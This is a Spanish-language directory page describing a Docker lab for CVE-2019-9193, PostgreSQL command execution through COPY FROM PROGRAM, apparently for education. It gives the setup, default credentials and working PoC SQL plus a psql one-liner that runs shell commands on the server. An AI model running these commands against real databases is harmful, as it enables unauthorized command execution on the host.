Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-9193byVulHub — Laboratorio basado en Docker que demuestra la ejecución arbitraria de comandos de PostgreSQL (CVE-2019-9193) mediante COPY FROM PROGRAM, con un PoC paso a paso para pruebas de seguridad y educación. | Kitploit
Herramientas/GitHubGitHub/corsisechero/cve-2019-9193byvulhub
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónSeguridad de Bases de DatosLabs y Práctica
GitHubcorsisechero/cve-2019-9193byvulhub

CVE-2019-9193byVulHub

Laboratorio basado en Docker que demuestra la ejecución arbitraria de comandos de PostgreSQL (CVE-2019-9193) mediante COPY FROM PROGRAM, con un PoC paso a paso para pruebas de seguridad y educación.

Ver Repositorio
5hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2019-9193byVulHub


Ejecución de comandos arbitrarios con privilegios de administrador en PostgreSQL (CVE-2019-9193)

Descripción

PostgreSQL es un potente sistema de gestión de bases de datos relacional de código abierto. Una vulnerabilidad presente en las versiones de la 9.3 a la 11 permite a los administradores o usuarios con privilegios COPY TO/FROM PROGRAM ejecutar comandos arbitrarios en el sistema.

Referencias:

  • GitHub - Vulhub - PostgreSQL CVE-2019-9193
  • Greenwolf Security - Authenticated Arbitrary Command Execution on PostgreSQL 9.3 - Latest

Configuración del entorno

Archivo Docker Compose ()

docker-compose.yml

Crea un archivo docker-compose.yml con el siguiente contenido:

root@kitploit:~
version: '2'
services:
 postgres:
   image: vulhub/postgres:10.7
   ports:
    - "5432:5432"
   environment:
    - POSTGRES_PASSWORD=postgres

Inicio del contenedor PostgreSQL

Ejecuta el contenedor con el siguiente comando:

root@kitploit:~
docker compose up -d

Verifica que el contenedor esté en ejecución:

root@kitploit:~
docker ps

La salida debería mostrar el contenedor PostgreSQL escuchando en el puerto 5432.


Ejecución del exploit sin entrar al contenedor

1. Instalación del cliente PostgreSQL

Si no tienes el cliente psql instalado, puedes hacerlo con:

  • Kali:
    root@kitploit:~
    apt-get install postgresql-client
    

2. Conexión a la base de datos desde la línea de comandos

Conéctate a la base de datos directamente desde Kali:

root@kitploit:~
psql -h localhost -p 5432 -U postgres

Se te solicitará la contraseña, ingresa:

root@kitploit:~
postgres

3. Ejecución del PoC (Proof of Concept)

Una vez conectado a la consola PostgreSQL, ejecuta los siguientes comandos para explotar la vulnerabilidad:

root@kitploit:~
-- Elimina la tabla si existe
DROP TABLE IF EXISTS cmd_exec;

-- Crea una nueva tabla para almacenar la salida del comando
CREATE TABLE cmd_exec(cmd_output text);

-- Ejecuta el comando 'id' mediante la función COPY FROM PROGRAM
COPY cmd_exec FROM PROGRAM 'id';

-- Muestra la salida del comando
SELECT * FROM cmd_exec;

4. Ejecución del comando desde la línea de comandos (sin shell interactiva)

Puedes ejecutar todo directamente desde la línea de comandos:

root@kitploit:~
psql -h localhost -p 5432 -U postgres -c "DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;"

Verificación de la salida

Si el exploit tiene éxito, deberías ver una salida similar: cmd_output

uid=999(postgres) gid=999(postgres) groups=999(postgres) (1 row)


Salida de la consola PostgreSQL

Presiona \q para salir:

root@kitploit:~
\q

Notas de seguridad

Esta vulnerabilidad permite la ejecución arbitraria de comandos con privilegios administrativos. Úsala solo en entornos controlados y con fines de estudio o verificación. Explotar esta vulnerabilidad en sistemas no autorizados es ilegal.

Descargar herramienta